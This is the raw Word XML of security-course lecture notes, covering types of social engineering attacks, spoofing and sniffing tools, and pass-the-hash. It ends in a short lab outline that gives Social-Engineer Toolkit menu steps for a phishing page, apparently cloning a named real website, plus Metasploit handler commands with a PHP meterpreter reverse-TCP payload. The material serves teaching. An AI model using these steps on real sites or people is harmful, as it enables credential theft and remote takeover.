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4C972" w14:textId="77777777" w:rsidR="00AF5BFA" w:rsidRPr="00516482" w:rsidRDefault="00AF5BFA" w:rsidP="00AF5BFA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Class no 08</w:t>
      </w:r>
      <w:r w:rsidR="00FA37F9" w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Theory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B0FDFF" w14:textId="77777777" w:rsidR="00AF5BFA" w:rsidRPr="00516482" w:rsidRDefault="00AF5BFA" w:rsidP="00AF5BFA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>03 Oct 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0CE279" w14:textId="77777777" w:rsidR="00FE14E9" w:rsidRPr="00516482" w:rsidRDefault="00FE14E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485916B2" w14:textId="77777777" w:rsidR="008E32AE" w:rsidRPr="00516482" w:rsidRDefault="008E32AE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Popular Social Engineering Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC8833B" w14:textId="77777777" w:rsidR="008E32AE" w:rsidRPr="00516482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Impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535F3CBC" w14:textId="77777777" w:rsidR="00A308DB" w:rsidRPr="00516482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 xml:space="preserve">Phishing </w:t>
      </w:r>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> very popular attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A9CB05" w14:textId="77777777" w:rsidR="00527E4C" w:rsidRPr="00516482" w:rsidRDefault="00527E4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 xml:space="preserve">Whaling and vishing </w:t>
      </w:r>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> send email a specific person(“the big fish”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DE46AD" w14:textId="77777777" w:rsidR="00527E4C" w:rsidRPr="00516482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Smishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A15BE" w14:textId="77777777" w:rsidR="001E712C" w:rsidRPr="00516482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516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Spim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B77D3" w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B77D3" w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="003B77D3" w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> spam over instant </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003B77D3" w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>messagin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B77D3" w:rsidRPr="0051648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B77D3" w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>spIM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B77D3" w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4630EB05" w14:textId="77777777" w:rsidR="001E712C" w:rsidRPr="00516482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Spear phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB50637" w14:textId="77777777" w:rsidR="001E712C" w:rsidRPr="00516482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Spam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BC5F4D" w14:textId="77777777" w:rsidR="005871C3" w:rsidRPr="00516482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Eliciting information</w:t>
      </w:r>
      <w:r w:rsidR="00444EF3" w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00444EF3" w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00444EF3" w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> future </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00444EF3" w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>attaack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49A0AEFD" w14:textId="77777777" w:rsidR="005871C3" w:rsidRPr="00516482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Prepending</w:t>
      </w:r>
      <w:r w:rsidR="00444EF3" w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C33A3" w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="007C33A3" w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>facebook.com@192.168.15.24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34660B95" w14:textId="77777777" w:rsidR="005871C3" w:rsidRPr="00516482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Identity fraud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D72DA4" w14:textId="77777777" w:rsidR="007C33A3" w:rsidRPr="00516482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Invoice scams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFED69A" w14:textId="77777777" w:rsidR="007C33A3" w:rsidRPr="00516482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 xml:space="preserve">Credential </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hardvesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="717BAC9B" w14:textId="77777777" w:rsidR="007C33A3" w:rsidRPr="00516482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Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3099AE45" w14:textId="77777777" w:rsidR="007C33A3" w:rsidRPr="00516482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Influence campaigns/hybrid warfare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BF5F91" w14:textId="77777777" w:rsidR="007C33A3" w:rsidRPr="00516482" w:rsidRDefault="007C33A3" w:rsidP="00FB2FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52C1F0A0" w14:textId="77777777" w:rsidR="00FB2FA5" w:rsidRPr="00516482" w:rsidRDefault="00FB2FA5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Shoulder Surfing and Dumpster Diving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753917BE" w14:textId="77777777" w:rsidR="00FB2FA5" w:rsidRPr="00516482" w:rsidRDefault="00FB2FA5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Tailgating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A50CA43" w14:textId="77777777" w:rsidR="00FB2FA5" w:rsidRPr="00516482" w:rsidRDefault="00FB2FA5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Hoaxes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786C3817" w14:textId="77777777" w:rsidR="00FB2FA5" w:rsidRPr="00516482" w:rsidRDefault="00FB2FA5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Physical Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB0BCB2" w14:textId="77777777" w:rsidR="00FB2FA5" w:rsidRPr="00516482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Malicious Universal Serial Bus(USB) cable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1943D9B3" w14:textId="77777777" w:rsidR="00FB2FA5" w:rsidRPr="00516482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Malicious flash drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B03641E" w14:textId="77777777" w:rsidR="00FB2FA5" w:rsidRPr="00516482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Card cloning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C24C6AA" w14:textId="77777777" w:rsidR="00FB2FA5" w:rsidRPr="00516482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Skimming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E63397" w14:textId="77777777" w:rsidR="00FB2FA5" w:rsidRPr="00516482" w:rsidRDefault="00FB2FA5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Adversarial Artificial Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F55D470" w14:textId="77777777" w:rsidR="00FB2FA5" w:rsidRPr="00516482" w:rsidRDefault="00FB2FA5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Supply-Chain Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC3A974" w14:textId="77777777" w:rsidR="00FB2FA5" w:rsidRPr="00516482" w:rsidRDefault="00045CBD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Reasons for Effectiveness of Social Engineering Attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4875AD" w14:textId="77777777" w:rsidR="00045CBD" w:rsidRPr="00516482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Authority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D7199B" w14:textId="77777777" w:rsidR="00045CBD" w:rsidRPr="00516482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Intimidation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFE2C24" w14:textId="77777777" w:rsidR="00045CBD" w:rsidRPr="00516482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Consensus/Social proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F0634D" w14:textId="77777777" w:rsidR="00045CBD" w:rsidRPr="00516482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lastRenderedPageBreak/>
        <w:t>Scarcity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011E757E" w14:textId="77777777" w:rsidR="00045CBD" w:rsidRPr="00516482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Urgency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088E0133" w14:textId="77777777" w:rsidR="00045CBD" w:rsidRPr="00516482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Familiarity/liking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD0AB43" w14:textId="77777777" w:rsidR="00045CBD" w:rsidRPr="00516482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Trust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42471559" w14:textId="77777777" w:rsidR="00045CBD" w:rsidRPr="00516482" w:rsidRDefault="00804F77" w:rsidP="00045CBD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Spoofing</w:t>
      </w:r>
      <w:r w:rsidR="00307190" w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: alter the source information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0ADDFC" w14:textId="77777777" w:rsidR="00130ACE" w:rsidRPr="00516482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Nemesis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F2E08C" w14:textId="77777777" w:rsidR="00130ACE" w:rsidRPr="00516482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Hping2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9CFFBA" w14:textId="77777777" w:rsidR="00130ACE" w:rsidRPr="00516482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516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Macchanger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="210B4423" w14:textId="77777777" w:rsidR="00130ACE" w:rsidRPr="00516482" w:rsidRDefault="009C6ADE" w:rsidP="00130ACE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Different Packet sniffing software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4841A3B8" w14:textId="77777777" w:rsidR="009C6ADE" w:rsidRPr="00516482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Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19329BBE" w14:textId="77777777" w:rsidR="009C6ADE" w:rsidRPr="00516482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16482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="458D8FF4" w14:textId="77777777" w:rsidR="009C6ADE" w:rsidRPr="00516482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16482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D86BDD" w14:textId="77777777" w:rsidR="003F7CCD" w:rsidRPr="00516482" w:rsidRDefault="003F7CCD" w:rsidP="003F7CCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23AEF087" w14:textId="77777777" w:rsidR="003F7CCD" w:rsidRPr="00516482" w:rsidRDefault="003F7CCD" w:rsidP="003F7CCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pass the Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094E2C76" w14:textId="77777777" w:rsidR="00FB2FA5" w:rsidRPr="00516482" w:rsidRDefault="00FB2FA5" w:rsidP="00FB2FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="170C4DF0" w14:textId="77777777" w:rsidR="00DF1CA7" w:rsidRPr="00516482" w:rsidRDefault="00C41F26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SAM file store hash type password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E16A3F6" w14:textId="77777777" w:rsidR="00666925" w:rsidRPr="00516482" w:rsidRDefault="001458A1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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559D01E9" w14:textId="77777777" w:rsidR="001458A1" w:rsidRPr="00516482" w:rsidRDefault="001458A1" w:rsidP="00FB2FA5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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="035F36EB" w14:textId="77777777" w:rsidR="001458A1" w:rsidRPr="00516482" w:rsidRDefault="001458A1" w:rsidP="001458A1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CA7EBA" w14:textId="77777777" w:rsidR="001458A1" w:rsidRPr="00516482" w:rsidRDefault="001458A1" w:rsidP="00FB2FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005164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6482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="516CAFF6" w14:textId="77777777" w:rsidR="00E46746" w:rsidRPr="00516482" w:rsidRDefault="00E46746" w:rsidP="00FB2FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>setoolkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(go another terminal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A75D16" w14:textId="77777777" w:rsidR="00E46746" w:rsidRPr="00516482" w:rsidRDefault="002C66A1" w:rsidP="00FB2FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005164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6482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CAB0457" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRPr="00516482" w:rsidRDefault="002C66A1" w:rsidP="00FB2FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67D22DEF" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRPr="00516482" w:rsidRDefault="002C66A1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 xml:space="preserve">use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploit.multi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053909BD" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRPr="00516482" w:rsidRDefault="002C66A1" w:rsidP="00FB2FA5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 xml:space="preserve">use payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="783737F3" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRPr="00516482" w:rsidRDefault="003F3287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 xml:space="preserve">&lt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00516482">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>https://iitju.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796A707E" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRPr="00516482" w:rsidRDefault="002C66A1" w:rsidP="002C66A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
